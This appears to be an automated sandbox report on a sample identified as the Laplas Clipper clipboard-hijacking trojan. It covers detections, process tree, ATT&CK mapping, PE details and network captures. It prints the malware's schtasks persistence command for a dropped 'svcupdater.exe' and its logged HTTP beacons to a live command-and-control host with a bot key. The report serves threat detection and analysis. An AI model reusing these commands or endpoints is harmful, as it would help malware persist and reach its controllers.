Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IVO2cpEukR.exe

Overview

General Information

Sample Name:IVO2cpEukR.exe
Analysis ID:736208
MD5:6738634d9b3bfcf7ebca8be48c091b3e
SHA1:f08091a4b3f5c167bcdfa565584bed8ed2a69f0c
SHA256:8c77759eff69330a5c9697d05e2a0f99c6edff904bdd52a048df0461d0459b27
Tags:exeLaplasClipper
Infos:

Detection

Laplas Clipper, MicroClip
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MicroClip
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Laplas Clipper
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • IVO2cpEukR.exe (PID: 4544 cmdline: C:\Users\user\Desktop\IVO2cpEukR.exe MD5: 6738634D9B3BFCF7EBCA8BE48C091B3E)
    • cmd.exe (PID: 5268 cmdline: cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 4256 cmdline: schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • svcupdater.exe (PID: 6084 cmdline: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe MD5: 6738634D9B3BFCF7EBCA8BE48C091B3E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: IVO2cpEukR.exe PID: 4544JoeSecurity_LaplasClipperYara detected Laplas ClipperJoe Security
    Process Memory Space: svcupdater.exe PID: 6084JoeSecurity_LaplasClipperYara detected Laplas ClipperJoe Security
      Process Memory Space: svcupdater.exe PID: 6084JoeSecurity_MicroClipYara detected MicroClipJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: IVO2cpEukR.exeReversingLabs: Detection: 14%
        Source: http://clipper.guru/bot/online?guid=computerAvira URL Cloud: Label: phishing
        Source: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eefAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exeReversingLabs: Detection: 14%
        Source: IVO2cpEukR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Joe Sandbox ViewIP Address: 45.159.189.115 45.159.189.115
        Source: svcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clipper.guru/bot/online?guid=computer
        Source: svcupdater.exe, 00000004.00000002.522749478.000000C000192000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
        Source: unknownDNS traffic detected: queries for: clipper.guru
        Source: global trafficHTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: global trafficHTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: IVO2cpEukR.exeReversingLabs: Detection: 14%
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeFile read: C:\Users\user\Desktop\IVO2cpEukR.exeJump to behavior
        Source: IVO2cpEukR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\IVO2cpEukR.exe C:\Users\user\Desktop\IVO2cpEukR.exe
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeFile created: C:\Users\user\AppData\Roaming\ipXroBUdMGJump to behavior
        Source: classification engineClassification label: mal84.troj.spyw.winEXE@7/3@3/1
        Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: IVO2cpEukR.exeStatic file information: File size 5021696 > 1048576
        Source: IVO2cpEukR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
        Source: IVO2cpEukR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x269800
        Source: IVO2cpEukR.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x208e00
        Source: IVO2cpEukR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: IVO2cpEukR.exeStatic PE information: section name: .symtab
        Source: svcupdater.exe.0.drStatic PE information: section name: .symtab
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeFile created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: svcupdater.exe, 00000004.00000002.522992248.0000023E77048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: IVO2cpEukR.exe, 00000000.00000002.258406632.0000028D55C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
        Source: C:\Users\user\Desktop\IVO2cpEukR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: IVO2cpEukR.exe PID: 4544, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
        Non-Application Layer Protocol
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Scheduled Task/Job
        11
        Process Injection
        LSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
        Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
        Remote System Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Ingress Tool Transfer
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 736208 Sample: IVO2cpEukR.exe Startdate: 02/11/2022 Architecture: WINDOWS Score: 84 24 clipper.guru 2->24 28 Antivirus detection for URL or domain 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Laplas Clipper 2->32 34 Yara detected MicroClip 2->34 8 IVO2cpEukR.exe 2 2->8         started        11 svcupdater.exe 1 2->11         started        signatures3 process4 dnsIp5 22 C:\Users\user\AppData\...\svcupdater.exe, PE32+ 8->22 dropped 15 cmd.exe 1 8->15         started        26 clipper.guru 45.159.189.115, 49708, 49709, 49710 HOSTING-SOLUTIONSUS Netherlands 11->26 36 Multi AV Scanner detection for dropped file 11->36 file6 signatures7 process8 signatures9 38 Uses schtasks.exe or at.exe to add and modify task schedules 15->38 18 conhost.exe 15->18         started        20 schtasks.exe 1 15->20         started        process10

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        IVO2cpEukR.exe15%ReversingLabs
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe15%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://clipper.guru/bot/online?guid=computer100%Avira URL Cloudphishing
        http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        clipper.guru
        45.159.189.115
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://clipper.guru/bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eeffalse
            unknown
            http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eeffalse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://clipper.guru/bot/online?guid=computersvcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            45.159.189.115
            clipper.guruNetherlands
            14576HOSTING-SOLUTIONSUSfalse
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:736208
            Start date and time:2022-11-02 18:28:46 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 19s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:IVO2cpEukR.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:16
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal84.troj.spyw.winEXE@7/3@3/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 96.9% (good quality ratio 90.6%)
            • Quality average: 59.3%
            • Quality standard deviation: 33.7%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com
            • Execution Graph export aborted for target IVO2cpEukR.exe, PID 4544 because there are no executed function
            • Execution Graph export aborted for target svcupdater.exe, PID 6084 because there are no executed function
            • Not all processes where analyzed, report is missing behavior information
            • VT rate limit hit for: IVO2cpEukR.exe
            TimeTypeDescription
            18:29:48Task SchedulerRun new task: ipXroBUdMG path: "C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe"
            No context
            No context
            No context
            No context
            No context
            Process:C:\Users\user\Desktop\IVO2cpEukR.exe
            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
            Category:dropped
            Size (bytes):5021696
            Entropy (8bit):5.993018394677145
            Encrypted:false
            SSDEEP:49152:cAMzHHGxBRJHrcFFmJAhaShRgxuMY8qa9vjTIt0IEqYjla27/BS5g+A:bMjGxBQFFmJA3Foq+vOEdZZ+A
            MD5:6738634D9B3BFCF7EBCA8BE48C091B3E
            SHA1:F08091A4B3F5C167BCDFA565584BED8ED2A69F0C
            SHA-256:8C77759EFF69330A5C9697D05E2A0F99C6EDFF904BDD52A048DF0461D0459B27
            SHA-512:C8E6F3DD4C7DE4C9A54278A398D096AABF8391A8A92484EB2A8E74D6D288D8B066E967916645E2AAEC53FB4C8C3AC9F1CBD0FC01C1B828A1A742AF3BC57AAAF5
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 15%
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........L.......".......&...................@..............................`P...........`... ...............................................N...............................N..f.................................................. @G.H............................text.....&.......&.................`..`.rdata... ...&... ...&.............@..@.data........@G......,G.............@....idata........N......0K.............@....reloc...f....N..h...6K.............@..B.symtab......PP.......L................B................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
            File Type:GLS_BINARY_LSB_FIRST
            Category:dropped
            Size (bytes):160
            Entropy (8bit):4.438743916256937
            Encrypted:false
            SSDEEP:3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
            MD5:E467C82627F5E1524FDB4415AF19FC73
            SHA1:B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
            SHA-256:116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
            SHA-512:2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............
            Process:C:\Windows\System32\schtasks.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):74
            Entropy (8bit):4.67858562893781
            Encrypted:false
            SSDEEP:3:BgnKDOhoeK0oiH0CWKAK89AAAXb:BgnKqhxKRkd2K89o
            MD5:ABC2D94AE97A29E1FF28221D1192EA39
            SHA1:EBD96AF6D655A50FC9655FFCEEE1CAA90629BA6F
            SHA-256:AF912F9EB0344ECA3E7083E7E999E60C6430BFF221ABC04FDD51662660A12CB5
            SHA-512:F80813E55B163DCC3F6677BA92A9CB3CCB245DFAA682366A9C528B2F49B87EB78944E25717B24CA9023D9DF957147121AD68476CC7BF4ED4851EC283AB6ABA79
            Malicious:false
            Preview:SUCCESS: The scheduled task "\ipXroBUdMG" has successfully been created...
            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
            Entropy (8bit):5.993018394677145
            TrID:
            • Win64 Executable (generic) (12005/4) 74.95%
            • Generic Win/DOS Executable (2004/3) 12.51%
            • DOS Executable Generic (2002/1) 12.50%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
            File name:IVO2cpEukR.exe
            File size:5021696
            MD5:6738634d9b3bfcf7ebca8be48c091b3e
            SHA1:f08091a4b3f5c167bcdfa565584bed8ed2a69f0c
            SHA256:8c77759eff69330a5c9697d05e2a0f99c6edff904bdd52a048df0461d0459b27
            SHA512:c8e6f3dd4c7de4c9a54278a398d096aabf8391a8a92484eb2a8e74d6d288d8b066e967916645e2aaec53fb4c8c3ac9f1cbd0fc01c1b828a1a742af3bc57aaaf5
            SSDEEP:49152:cAMzHHGxBRJHrcFFmJAhaShRgxuMY8qa9vjTIt0IEqYjla27/BS5g+A:bMjGxBQFFmJA3Foq+vOEdZZ+A
            TLSH:06364B17FCA214F9D5BEF13086529322BA7178A943303BD35F949A691A26FD0BB3D311
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........L.......".......&...................@..............................`P...........`... ............................
            Icon Hash:00828e8e8686b000
            Entrypoint:0x46bd80
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:1
            File Version Major:6
            File Version Minor:1
            Subsystem Version Major:6
            Subsystem Version Minor:1
            Import Hash:93a138801d9601e4c36e6274c8b9d111
            Instruction
            jmp 00007F0FD4C47100h
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            pushfd
            dec eax
            sub esp, 70h
            dec eax
            mov dword ptr [esp+50h], edi
            dec eax
            mov dword ptr [esp+48h], esi
            dec eax
            mov dword ptr [esp+40h], ebp
            dec eax
            mov dword ptr [esp+38h], ebx
            dec esp
            mov dword ptr [esp+30h], esp
            dec esp
            mov dword ptr [esp+28h], ebp
            dec esp
            mov dword ptr [esp+20h], esi
            dec esp
            mov dword ptr [esp+58h], edi
            dec ecx
            mov edi, eax
            dec eax
            mov edx, dword ptr [00000028h]
            dec eax
            cmp edx, 00000000h
            jne 00007F0FD4C4A7AEh
            dec eax
            mov eax, 00000000h
            jmp 00007F0FD4C4A830h
            dec eax
            mov edx, dword ptr [edx+00000000h]
            dec eax
            cmp edx, 00000000h
            jne 00007F0FD4C4A7A7h
            call 00007F0FD4C4A8E8h
            dec eax
            mov dword ptr [esp+60h], edx
            dec eax
            mov dword ptr [esp+68h], esp
            dec eax
            mov ebx, dword ptr [edx+30h]
            dec eax
            mov ebx, dword ptr [ebx]
            dec eax
            cmp edx, ebx
            je 00007F0FD4C4A7CFh
            dec eax
            mov ebp, dword ptr [00000028h]
            dec eax
            mov dword ptr [ebp+00000000h], ebx
            dec eax
            mov edi, dword ptr [ebx+38h]
            dec eax
            sub edi, 08h
            dec eax
            lea esi, dword ptr [FFFD1DCEh]
            dec eax
            mov dword ptr [edi], esi
            dec eax
            sub edi, 78h
            dec eax
            mov dword ptr [edi+68h], esp
            dec eax
            mov esp, edi
            dec eax
            mov ebx, dword ptr [ecx]
            dec eax
            mov ecx, dword ptr [ecx+08h]
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x4ed0000x4a0.idata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4ee0000x16684.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x4740200x148.data
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x2696160x269800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x26b0000x208cd80x208e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x4740000x78f880x40400False0.4463954584143969data5.511488066172076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .idata0x4ed0000x4a00x600False0.3483072916666667data3.68798233819499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .reloc0x4ee0000x166840x16800False0.2963324652777778data5.457203646831808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            .symtab0x5050000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            DLLImport
            kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, QueryFullProcessImageNameA, ProcessIdToSessionId, PostQueuedCompletionStatus, OpenProcess, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
            TimestampSource PortDest PortSource IPDest IP
            Nov 2, 2022 18:29:50.770592928 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:29:50.800642967 CET804970845.159.189.115192.168.2.6
            Nov 2, 2022 18:29:50.800806999 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:29:50.821186066 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:29:50.851111889 CET804970845.159.189.115192.168.2.6
            Nov 2, 2022 18:29:50.851912975 CET804970845.159.189.115192.168.2.6
            Nov 2, 2022 18:29:50.852407932 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:29:50.884027958 CET804970845.159.189.115192.168.2.6
            Nov 2, 2022 18:29:50.924983978 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:30:20.881997108 CET804970845.159.189.115192.168.2.6
            Nov 2, 2022 18:30:20.882083893 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:30:20.882555008 CET4970880192.168.2.645.159.189.115
            Nov 2, 2022 18:30:20.912445068 CET804970845.159.189.115192.168.2.6
            Nov 2, 2022 18:30:50.983144045 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:30:51.012626886 CET804970945.159.189.115192.168.2.6
            Nov 2, 2022 18:30:51.014977932 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:30:51.016272068 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:30:51.045741081 CET804970945.159.189.115192.168.2.6
            Nov 2, 2022 18:30:51.046528101 CET804970945.159.189.115192.168.2.6
            Nov 2, 2022 18:30:51.046916962 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:30:51.077117920 CET804970945.159.189.115192.168.2.6
            Nov 2, 2022 18:30:51.118437052 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:31:21.076092005 CET804970945.159.189.115192.168.2.6
            Nov 2, 2022 18:31:21.076174021 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:31:21.083151102 CET4970980192.168.2.645.159.189.115
            Nov 2, 2022 18:31:21.112533092 CET804970945.159.189.115192.168.2.6
            Nov 2, 2022 18:31:51.933299065 CET4971080192.168.2.645.159.189.115
            Nov 2, 2022 18:31:51.962971926 CET804971045.159.189.115192.168.2.6
            Nov 2, 2022 18:31:51.963299036 CET4971080192.168.2.645.159.189.115
            Nov 2, 2022 18:31:51.963864088 CET4971080192.168.2.645.159.189.115
            Nov 2, 2022 18:31:51.994096041 CET804971045.159.189.115192.168.2.6
            Nov 2, 2022 18:31:51.995026112 CET804971045.159.189.115192.168.2.6
            Nov 2, 2022 18:31:51.995821953 CET4971080192.168.2.645.159.189.115
            Nov 2, 2022 18:31:52.027110100 CET804971045.159.189.115192.168.2.6
            Nov 2, 2022 18:31:52.068528891 CET4971080192.168.2.645.159.189.115
